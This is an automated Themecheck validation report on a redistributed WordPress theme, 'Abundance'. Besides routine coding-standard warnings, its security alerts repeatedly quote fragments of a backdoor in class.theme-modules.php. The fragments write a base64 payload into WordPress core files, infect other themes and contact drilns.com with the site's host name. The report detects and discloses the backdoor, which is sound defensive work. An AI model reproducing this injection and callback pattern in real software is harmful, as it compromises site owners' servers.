0
Validation results

Abundance | Shared by VestaThemes.com

Abundance | Shared by VestaThemes.com

WordPress 6.5.2 theme
0
  • THEME TYPEWordPress theme 6.5.2
  • FILE NAMEabundance.zip
  • FILE SIZE3136376 bytes
  • MD5e350652a9853fed0714a4c5a0da4c6b8
  • SHA17de9785c3631ed9232125e4949b3b9f023dc5b3a
  • LICENSENone
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • VERSION4.3
  • AUTHOR URI
  • CREATION DATE2019-07-29
  • LAST FILE UPDATE2019-07-29
  • LAST VALIDATION2019-07-29 23:31
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  3. Security breaches : Use of base64_decode() Found base64_decode in file class-framework-widgets.php. 1716: $instagram = unserialize( base64_decode( $instagram ) );Found base64_decode in file function-set-avia-ajax.php. 629: $elements = unserialize( base64_decode( $_POST['defaul_elements'] ) );792: $options = unserialize(base64_decode($options));Found base64_decode in file avia-import-class.php. 25: $options = unserialize(base64_decode($options));26: $dynamic_pages = unserialize(base64_decode($dynamic_pages));27: $dynamic_elements = unserialize(base64_decode($dynamic_elements));62: $widget_settings = unserialize(base64_decode($widget_settings));84: $new_fonts = unserialize(base64_decode($new_fonts));Found base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  4. Security breaches : Use of base64_encode() Found base64_encode in file class-htmlhelper.php.
     $elString = base64_encode(serialize($element['temlate_default_elements']));
    Found base64_encode in file class-framework-widgets.php.
     $instagram = base64_encode( serialize( $instagram ) );
    Found base64_encode in file avia-export-class.php.
     $widget_settings = base64_encode(serialize($widget_settings));
     $export = base64_encode(serialize($export));
     if($export_dynamic_pages) $export_dynamic_pages = base64_encode(serialize($export_dynamic_pages));
     if($export_dynamic_elements) $export_dynamic_elements = base64_encode(serialize($export_dynamic_elements));
     $option = base64_encode( serialize( $option ) );
  5. Malware : Operations on file system fopen was found in the file function-set-avia-backend.php 789: $handle = @fopen( $index_file, 'w' );807: $handle = @fopen( $file, 'w' );815: $handle = fopen($file, 'r');fwrite was found in the file function-set-avia-backend.php 792: fwrite( $handle, '<?php\r\necho 'Sorry, browsing the directory is not allow810: $created = fwrite( $handle, $content );fclose was found in the file function-set-avia-backend.php 793: fclose( $handle );811: fclose( $handle );818: fclose( $handle );fopen was found in the file function-set-avia-backend.php 789: $handle = @fopen( $index_file, 'w' );807: $handle = @fopen( $file, 'w' );815: $handle = fopen($file, 'r');fwrite was found in the file function-set-avia-backend.php 792: fwrite( $handle, '<?php\r\necho 'Sorry, browsing the directory is not allow810: $created = fwrite( $handle, $content );fclose was found in the file function-set-avia-backend.php 793: fclose( $handle );811: fclose( $handle );818: fclose( $handle );fopen was found in the file function-set-avia-backend.php 789: $handle = @fopen( $index_file, 'w' );807: $handle = @fopen( $file, 'w' );815: $handle = fopen($file, 'r');fread was found in the file function-set-avia-backend.php 816: $filecontent = fread($handle, filesize($file));fclose was found in the file function-set-avia-backend.php 793: fclose( $handle );811: fclose( $handle );818: fclose( $handle );file_get_contents was found in the file function-set-avia-ajax.php 768: $options = @file_get_contents($path);fopen was found in the file auto-updates.php 71: $handle = @fopen( $this->custom_css, 'w' );101: $handle = @fopen( $css_path, 'r' );fwrite was found in the file auto-updates.php 73: if ($handle && fwrite($handle, $this->custom_css_content)) {fopen was found in the file auto-updates.php 71: $handle = @fopen( $this->custom_css, 'w' );101: $handle = @fopen( $css_path, 'r' );fread was found in the file auto-updates.php 104: $this->custom_css_content = fread($handle, $size);fclose was found in the file auto-updates.php 107: fclose($handle);file_get_contents was found in the file function-set-avia-frontend.php 636: $body = @file_get_contents($url, NULL, stream_context_create($options), 0, 1);file_get_contents was found in the file parsers.php 252: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {fopen was found in the file parsers.php 401: $fp = $this->fopen( $file, 'r' );627: function fopen( $filename, $mode = 'r' ) {630: return fopen( $filename, $mode );fclose was found in the file parsers.php 450: $this->fclose($fp);645: function fclose( $fp ) {648: return fclose( $fp );fopen was found in the file parsers.php 401: $fp = $this->fopen( $file, 'r' );627: function fopen( $filename, $mode = 'r' ) {630: return fopen( $filename, $mode );fopen was found in the file parsers.php 401: $fp = $this->fopen( $file, 'r' );627: function fopen( $filename, $mode = 'r' ) {630: return fopen( $filename, $mode );fclose was found in the file parsers.php 450: $this->fclose($fp);645: function fclose( $fp ) {648: return fclose( $fp );fclose was found in the file parsers.php 450: $this->fclose($fp);645: function fclose( $fp ) {648: return fclose( $fp );file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file helper-slideshow.php 541: if(@file_get_contents($checkpath,0,NULL,0,1))
  6. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-adminpages.php : 133: $page_creation_method = 'add_object_page'; //deprecated since 4.5File class-adminpages.php : 134: if(function_exists('add_menu_page')) { $page_creation_method = 'add_menu_page'; }File class-adminpages.php : 134: if(function_exists('add_menu_page')) { $page_creation_method = 'add_menu_page'; }File class-adminpages.php : 160: $avia_page = add_submenu_page( $top_level, // parent page slug to attachFile function-set-avia-ajax.php : 617: if($_POST['method'] == 'add_option_page')619: $result = $options->add_option_page($_POST);
  7. Inapropriate constants : Use of TEMPLATEPATH Constant TEMPLATEPATH was found in the file functions.php. get_template_directory() should be used instead. 68: $lang = TEMPLATEPATH . '/lang';
  8. Content width : Proper definition of content_width No content width has been defined. Example:
    if ( ! isset( $content_width ) ) $content_width = 900;
  9. Deprecated functions : screen_icon screen_icon found in file wordpress-importer.php. Deprecated since version 3.8.1032: screen_icon();
  10. Deprecated functions : wp_get_http wp_get_http found in file wordpress-importer.php. Deprecated since version 4.4. Use WP_Http instead.905: $headers = wp_get_http( $url, $upload['file'] );
  11. Deprecated functions : get_bloginfo get_bloginfo('template_url') was found in the file header.php. Use get_template_directory_uri() instead.37: <link rel='stylesheet' href='<?php echo get_bloginfo('template_url'); ?>/js/prettyPhoto/css/prettyPhoto.css' type='38: <link rel='stylesheet' href='<?php echo get_bloginfo('template_url'); ?>/js/projekktor/theme/style.css' type='text/39: <link rel='stylesheet' href='<?php echo get_bloginfo('template_url'); ?>/css/<?php avia_option('stylesheet', 'minim40: <link rel='stylesheet' href='<?php echo get_bloginfo('template_url'); ?>/css/shortcodes.css' type='text/css' media=41: <link rel='stylesheet' href='<?php echo get_bloginfo('template_url'); ?>/css/slideshow.css' type='text/css' media='77: <link rel='stylesheet' href='<?php echo get_bloginfo('template_url'); ?>/css/custom.css' type='text/css' media='scr
  12. Post pagination : Implementation The theme doesn't have post pagination code in it. Use posts_nav_link() or paginate_links() or the_posts_pagination() or the_posts_navigation() or next_posts_link() and previous_posts_link() to add post pagination.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is abundance-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enter Name of the new Widget Area here' in file class-sidebar-generator.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Add Widget Area' in file class-sidebar-generator.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Begin installing plugin', 'Begin installing plugins' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Begin activating plugin', 'Begin activating plugins' in file class-tgm-plugin-activation.php.Found a translation function that is missing a text-domain. Function esc_attr__, with the arguments 'Insert Video' in file class-media.php.Found a translation function that is missing a text-domain. Function __, with the arguments '(remove)' in file class-htmlhelper.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file class-htmlhelper.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file class-htmlhelper.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file class-htmlhelper.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s (Invalid)' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s (Pending)' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Column' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '(Mega Menu)' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Move up' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Move down' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Edit Menu Item' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Edit Menu Item' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'URL' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Navigation Label' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Mega Menu Column Title <span class="avia_supersmall">(if you dont want to display a title just enter a single dash: "-" )</span>' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Title Attribute' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'link Target' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Same window or tab' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'New window or tab' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'CSS Classes (optional)' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'link Relationship (XFN)' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Description' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments in file class-megamenu.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Original: %s' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Remove' in file class-megamenu.php.Found a translation function that is missing a text-domain. Function __, with the arguments '<cite class="author_name heading">%s</cite> <span class="says">says:</span>' in file loop-comments.php.Found a translation function that is missing a text-domain. Function __, with the arguments '(Edit)' in file loop-comments.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%1$s at %2$s' in file loop-comments.php.Found a translation function that is missing a text-domain. Function __, with the arguments "%s: Widget class not found. Make sure this widget exists and the class name is correct" in file register-shortcodes.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are avia_framework, woothemes, tgmpa, envato, wordpress-importer, woocommerce.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  5. Fundamental theme elements : Presence of add_theme_support()Could not find add_theme_support( 'automatic-feed-links' ).
  6. Fundamental theme elements : Presence of wp_link_pages()Could not find wp_link_pages.
  7. Fundamental theme elements : Presence of post_class()Could not find post_class.
  8. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  9. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  10. Deprecated functions : screen_iconscreen_icon found in file wordpress-importer.php. Deprecated since version 3.8.1032: screen_icon();
  11. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  12. I18N implementation : Proper use of _e(Possible variable $title found in translation function in class-megamenu.php. Translation function calls should not contain PHP variables. Possible variable $title found in translation function in class-megamenu.php. Translation function calls should not contain PHP variables. Possible variable $title found in translation function in class-megamenu.php. Translation function calls should not contain PHP variables.
  13. CSS files : Presence of license typeLicense: is missing from style.css header.
  14. CSS files : Presence of license urlLicense URI: is missing from style.css header.
  15. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  16. CSS files : Presence of .sticky class.sticky css class is needed in theme css.
  17. CSS files : Presence of .bypostauthor class.bypostauthor css class is needed in theme css.
  18. Date and time implementation : Use of the_time()At least one hard coded date was found in the file loop-archive.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file loop-index.php. Function get_option( 'date_format' ) should be used instead.
  19. Screenshot : Screenshot fileScreenshot size is 300x225px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in function-set-avia-frontend.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
